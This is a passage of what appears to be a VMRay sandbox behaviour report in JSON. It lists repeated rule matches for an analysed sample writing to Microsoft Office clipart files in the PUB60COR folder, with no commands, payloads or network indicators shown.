"ref_id": "gfn_35330", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107468.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107480.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107480.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_35337", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107480.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107482.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107482.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_35344", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107482.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107484.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107484.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_35351", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107484.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107488.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107488.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_35358", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107488.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107490.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107490.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_35365", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107490.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107492.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107492.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_35374", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107492.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107494.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107494.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_35381", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107494.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107496.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107496.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_35388", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107496.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107500.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107500.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_35395", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107500.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107502.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107502.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_35402", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107502.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107512.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107512.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_35409", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107512.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107514.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107514.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_35416", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107514.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107516.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107516.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_35423", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107516.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107526.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107526.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_35430", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107526.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107528.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107528.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_35437", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107528.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107544.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107544.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_35444", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107544.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107658.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107658.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_35453", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107658.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107708.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107708.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_35460", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107708.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107712.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107712.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_35467", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107712.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107718.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107718.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_35474", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107718.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107722.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107722.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_35481", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107722.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107724.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107724.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_35488", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107724.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107728.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107728.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_35495", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107728.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107730.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107730.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_35502", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107730.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107734.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107734.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_35509", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107734.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107742.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107742.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_35516", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107742.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107744.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107744.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_35523", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107744.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107746.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107746.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_35530", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107746.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107748.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107748.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_35537", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107748.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107750.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107750.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_35544", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107750.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0136865.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0136865.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_35551", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0136865.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0144773.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0144773.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_35560", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0144773.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145168.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft 